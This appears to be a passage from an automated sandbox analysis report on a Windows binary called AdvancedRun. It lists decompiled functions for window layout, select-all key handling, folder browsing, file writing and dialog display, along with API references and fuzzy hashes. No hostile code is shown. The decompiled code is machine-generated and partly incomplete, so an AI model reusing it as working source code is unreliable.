                                                                    • Part of subcall function 00402E22: DeferWindowPos.USER32 ref: 00402EB4
                                                                  • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                  • String ID: $
                                                                  • API String ID: 2498372239-3993045852
                                                                  • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                  • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                  • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                  • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                  				int _t14;
                                                                  
                                                                  				if(_a8 == 0x100 && _a12 == 0x41) {
                                                                  					GetKeyState(0xa2);
                                                                  					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
                                                                  						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
                                                                  							_t14 = E00403A60(0xa5);
                                                                  							if(_t14 == 0) {
                                                                  								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
                                                                  			}

                                                                  • Instruction addresses: 0x00403a7d, 0x00403a8c, 0x00403a9c, 0x00403aba, 0x00403adf, 0x00403ae7, 0x00403af4, 0x00403af4, 0x00403ae7, 0x00403aba, 0x00403a9c, 0x00403b13

                                                                  APIs
                                                                  • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                    • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                  • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: State$CallMessageProcSendWindow
                                                                  • String ID: A
                                                                  • API String ID: 3924021322-3554254475
                                                                  • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                  • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                  • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                  • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 91%
                                                                  			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
                                                                  				intOrPtr _v20;
                                                                  				char _v1072;
                                                                  				void _v3672;
                                                                  				char _v4496;
                                                                  				intOrPtr _v4556;
                                                                  				char _v4560;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				intOrPtr* _t41;
                                                                  				void* _t45;
                                                                  
                                                                  				_t45 = __eflags;
                                                                  				E0040B550(0x11cc, __ecx);
                                                                  				E00402923( &_v4560);
                                                                  				_v4560 = 0x40db44;
                                                                  				E00406670( &_v4496, _t45);
                                                                  				_v4496 = 0x40dab0;
                                                                  				memset( &_v3672, 0, 0x10);
                                                                  				E0040A909( &_v1072);
                                                                  				_t41 = _a4;
                                                                  				_v4556 = 0x71;
                                                                  				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
                                                                  					L0040B266();
                                                                  					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
                                                                  				}
                                                                  				_v4496 = 0x40dab0;
                                                                  				_v4560 = 0x40db44;
                                                                  				E004067AC( &_v4496);
                                                                  				return E00402940( &_v4560);
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                  • memset.MSVCRT ref: 00403537
                                                                  • _ultow.MSVCRT ref: 00403575
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$memset$_ultow
                                                                  • String ID: cf@$q
                                                                  • API String ID: 3448780718-2693627795
                                                                  • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                  • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                  • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                  • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 64%
                                                                  			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
                                                                  				void _v514;
                                                                  				signed short _v516;
                                                                  				void _v1026;
                                                                  				signed short _v1028;
                                                                  				void* __esi;
                                                                  				void* _t17;
                                                                  				intOrPtr* _t26;
                                                                  				signed short* _t28;
                                                                  
                                                                  				_v516 = _v516 & 0x00000000;
                                                                  				_t26 = __ecx;
                                                                  				memset( &_v514, 0, 0x1fc);
                                                                  				_v1028 = _v1028 & 0x00000000;
                                                                  				memset( &_v1026, 0, 0x1fc);
                                                                  				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
                                                                  				_t28 =  &_v516;
                                                                  				E00407250(_t28, _t17);
                                                                  				_push(_t28);
                                                                  				_push(L"</%s>\r\n");
                                                                  				_push(0xff);
                                                                  				_push( &_v1028);
                                                                  				L0040B1EC();
                                                                  				return E00407343(_t26, _a4,  &_v1028);
                                                                  			}

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00407E48
                                                                  • memset.MSVCRT ref: 00407E5F
                                                                    • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                    • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                  • _snwprintf.MSVCRT ref: 00407E8E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                  • String ID: </%s>
                                                                  • API String ID: 3400436232-259020660
                                                                  • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                  • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                  • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                  • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 77%
                                                                  			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
                                                                  				void _v8198;
                                                                  				short _v8200;
                                                                  				void* _t9;
                                                                  				void* _t12;
                                                                  				intOrPtr _t19;
                                                                  				intOrPtr _t20;
                                                                  				intOrPtr _t25; // used below but missing from the decompiler's declaration list
                                                                  
                                                                  				_t19 = __ecx;
                                                                  				_t9 = E0040B550(0x2004, __ecx);
                                                                  				_t20 = _t19;
                                                                  				if(_t20 == 0) {
                                                                  					_t20 =  *0x40fe24; // 0x0
                                                                  				}
                                                                  				_t25 =  *0x40fb90;
                                                                  				if( *0x40fb90 != 0) {
                                                                  					_v8200 = _v8200 & 0x00000000;
                                                                  					memset( &_v8198, 0, 0x2000);
                                                                  					_push(_t20);
                                                                  					_t12 = 5;
                                                                  					E00405E8D(_t12);
                                                                  					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
                                                                  						SetWindowTextW(_a4,  &_v8200);
                                                                  					}
                                                                  					return EnumChildWindows(_a4, E00405DAC, 0);
                                                                  				}
                                                                  				return _t9;
                                                                  			}

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                  • String ID: caption
                                                                  • API String ID: 1523050162-4135340389
                                                                  • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                  • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                  • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                  • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                  				struct HINSTANCE__* _t11;
                                                                  				struct HINSTANCE__** _t14;
                                                                  				struct HINSTANCE__* _t15;
                                                                  
                                                                  				_t14 = __eax;
                                                                  				if( *((intOrPtr*)(__eax)) == 0) {
                                                                  					_t11 = E00405436(L"winsta.dll");
                                                                  					 *_t14 = _t11;
                                                                  					if(_t11 != 0) {
                                                                  						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
                                                                  					}
                                                                  				}
                                                                  				_t15 = _t14[1];
                                                                  				if(_t15 == 0) {
                                                                  					return 0;
                                                                  				} else {
                                                                  					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                  • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                  • API String ID: 946536540-379566740
                                                                  • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                  • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                  • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                  • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 93%
                                                                  			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                  				signed int _t21;
                                                                  				signed int _t23;
                                                                  				void* _t24;
                                                                  				signed int _t31;
                                                                  				void* _t33;
                                                                  				void* _t44;
                                                                  				signed int _t46;
                                                                  				void* _t48;
                                                                  				signed int _t51;
                                                                  				int _t52;
                                                                  				void** _t53;
                                                                  				void* _t58;
                                                                  				void** _t1; // decompiler temporaries used below but missing from the declaration list
                                                                  				void** _t2;
                                                                  				void** _t10;
                                                                  
                                                                  				_t53 = __esi;
                                                                  				_t1 =  &(_t53[1]); // 0x0
                                                                  				_t51 =  *_t1;
                                                                  				_t21 = 0;
                                                                  				if(_t51 <= 0) {
                                                                  					L4:
                                                                  					_t2 =  &(_t53[2]); // 0x8
                                                                  					_t33 =  *_t53;
                                                                  					_t23 =  *_t2 + _t51;
                                                                  					_t46 = 8;
                                                                  					_t53[1] = _t23;
                                                                  					_t24 = _t23 * _t46;
                                                                  					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                  					L0040B26C();
                                                                  					_t10 =  &(_t53[1]); // 0x0
                                                                  					 *_t53 = _t24;
                                                                  					memset(_t24, 0,  *_t10 << 3);
                                                                  					_t52 = _t51 << 3;
                                                                  					memcpy( *_t53, _t33, _t52);
                                                                  					if(_t33 != 0) {
                                                                  						_push(_t33);
                                                                  						L0040B272();
                                                                  					}
                                                                  					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                  					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                  				} else {
                                                                  					_t44 =  *__esi;
                                                                  					_t48 = _t44;
                                                                  					while( *_t48 != 0) {
                                                                  						_t21 = _t21 + 1;
                                                                  						_t48 = _t48 + 8;
                                                                  						_t58 = _t21 - _t51;
                                                                  						if(_t58 < 0) {
                                                                  							continue;
                                                                  						} else {
                                                                  							goto L4;
                                                                  						}
                                                                  						goto L7;
                                                                  					}
                                                                  					_t31 = _t21 << 3;
                                                                  					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                  					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                  				}
                                                                  				L7:
                                                                  				return 1;
                                                                  			}

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@??3@memcpymemset
                                                                  • String ID:
                                                                  • API String ID: 1865533344-0
                                                                  • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                  • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                  • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                  • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
Uniqueness
• Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 37%
                                                                  			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
                                                                  				void* _v8;
                                                                  				wchar_t* _v16;
                                                                  				intOrPtr _v20;
                                                                  				intOrPtr _v24;
                                                                  				intOrPtr _v28;
                                                                  				intOrPtr _v32;
                                                                  				intOrPtr _v36;
                                                                  				char _v40;
                                                                  				long _v564;
                                                                  				char* _t18;
                                                                  				char* _t22;
                                                                  				wchar_t* _t23;
                                                                  				intOrPtr* _t24;
                                                                  				intOrPtr* _t26;
                                                                  				intOrPtr _t30;
                                                                  				void* _t35;
                                                                  				char* _t36;
                                                                  
                                                                  				_t18 =  &_v8;
                                                                  				_t30 = 0;
                                                                  				__imp__SHGetMalloc(_t18);
                                                                  				if(_t18 >= 0) {
                                                                  					_v40 = _a4;
                                                                  					_v28 = _a8;
                                                                  					_t22 =  &_v40;
                                                                  					_v36 = 0;
                                                                  					_v32 = 0;
                                                                  					_v24 = 4;
                                                                  					_v20 = E0040AC81;
                                                                  					_v16 = __esi;
                                                                  					__imp__SHBrowseForFolderW(_t22, _t35);
                                                                  					_t36 = _t22;
                                                                  					if(_t36 != 0) {
                                                                  						_t23 =  &_v564;
                                                                  						__imp__SHGetPathFromIDListW(_t36, _t23);
                                                                  						if(_t23 != 0) {
                                                                  							_t30 = 1;
                                                                  							wcscpy(__esi,  &_v564);
                                                                  						}
                                                                  						_t24 = _v8;
                                                                  						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
                                                                  						_t26 = _v8;
                                                                  						 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                                  					}
                                                                  				}
                                                                  				return _t30;
                                                                  			}

Instruction addresses (decompiler line map): 0x0040ad06 0x0040ad0a 0x0040ad0c 0x0040ad14 0x0040ad19 0x0040ad1f 0x0040ad23 0x0040ad27 0x0040ad2a 0x0040ad2d 0x0040ad34 0x0040ad3b 0x0040ad3e 0x0040ad44 0x0040ad48 0x0040ad4a 0x0040ad52 0x0040ad5a 0x0040ad64 0x0040ad65 0x0040ad6b 0x0040ad6c 0x0040ad73 0x0040ad76 0x0040ad7c 0x0040ad7c 0x0040ad7f 0x0040ad84

                                                                  APIs
                                                                  • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                  • wcscpy.MSVCRT ref: 0040AD65
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                  • String ID:
                                                                  • API String ID: 3917621476-0
                                                                  • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                  • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                  • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                  • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
Uniqueness
• Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                  				long _v8;
                                                                  				long _v12;
                                                                  				long _t13;
                                                                  				void* _t14;
                                                                  				struct HWND__* _t24;
                                                                  
                                                                  				_t24 = GetDlgItem(_a4, _a8);
                                                                  				_t13 = SendMessageW(_t24, 0x146, 0, 0);
                                                                  				_v12 = _t13;
                                                                  				_v8 = 0;
                                                                  				if(_t13 <= 0) {
                                                                  					L3:
                                                                  					_t14 = 0;
                                                                  				} else {
                                                                  					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
                                                                  						_v8 = _v8 + 1;
                                                                  						if(_v8 < _v12) {
                                                                  							continue;
                                                                  						} else {
                                                                  							goto L3;
                                                                  						}
                                                                  						goto L4;
                                                                  					}
                                                                  					SendMessageW(_t24, 0x14e, _v8, 0);
                                                                  					_t14 = 1;
                                                                  				}
                                                                  				L4:
                                                                  				return _t14;
                                                                  			}

Instruction addresses (decompiler line map): 0x00404a62 0x00404a6a 0x00404a6e 0x00404a71 0x00404a74 0x00404a92 0x00404a92 0x00404a76 0x00404a76 0x00404a87 0x00404a90 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00404a90 0x00404aa3 0x00404aa7 0x00404aa7 0x00404a94 0x00404a98

                                                                  APIs
                                                                  • GetDlgItem.USER32 ref: 00404A52
                                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Item
                                                                  • String ID:
                                                                  • API String ID: 3888421826-0
                                                                  • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                  • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                  • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                  • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
Uniqueness
• Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 93%
                                                                  			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                  				long _v8;
                                                                  				void _v8199;
                                                                  				char _v8200;
                                                                  
                                                                  				E0040B550(0x2004, __ecx);
                                                                  				_v8200 = 0;
                                                                  				memset( &_v8199, 0, 0x1fff);
                                                                  				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                  				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                  			}

Instruction addresses (decompiler line map): 0x004072e0 0x004072f7 0x004072fd 0x00407316 0x00407342

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004072FD
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                  • strlen.MSVCRT ref: 00407328
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                  • String ID:
                                                                  • API String ID: 2754987064-0
                                                                  • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                  • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                  • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                  • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
Uniqueness
• Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00408DC8(void** __eax, struct HWND__* _a4) {
                                                                  				int _t7;
                                                                  				void** _t11;
                                                                  
                                                                  				_t11 = __eax;
                                                                  				if( *0x4101b4 == 0) {
                                                                  					memcpy(0x40f5c8,  *__eax, 0x50);
                                                                  					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
                                                                  					 *0x4101b4 = 1;
                                                                  					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
                                                                  					 *0x4101b4 =  *0x4101b4 & 0x00000000;
                                                                  					 *0x40f2f4 = _t7;
                                                                  					return 1;
                                                                  				} else {
                                                                  					return 1;
                                                                  				}
                                                                  			}

Instruction addresses (decompiler line map): 0x00408dd0 0x00408dd2 0x00408de2 0x00408df4 0x00408e01 0x00408e1b 0x00408e21 0x00408e28 0x00408e30 0x00408dd4 0x00408dd8 0x00408dd8

                                                                  APIs
                                                                  • memcpy.MSVCRT ref: 00408DE2
                                                                  • memcpy.MSVCRT ref: 00408DF4
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00408E07
                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_00008ADB,00000000), ref: 00408E1B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                  • String ID:
                                                                  • API String ID: 1386444988-0
                                                                  • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                  • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                  • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                  • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
Uniqueness
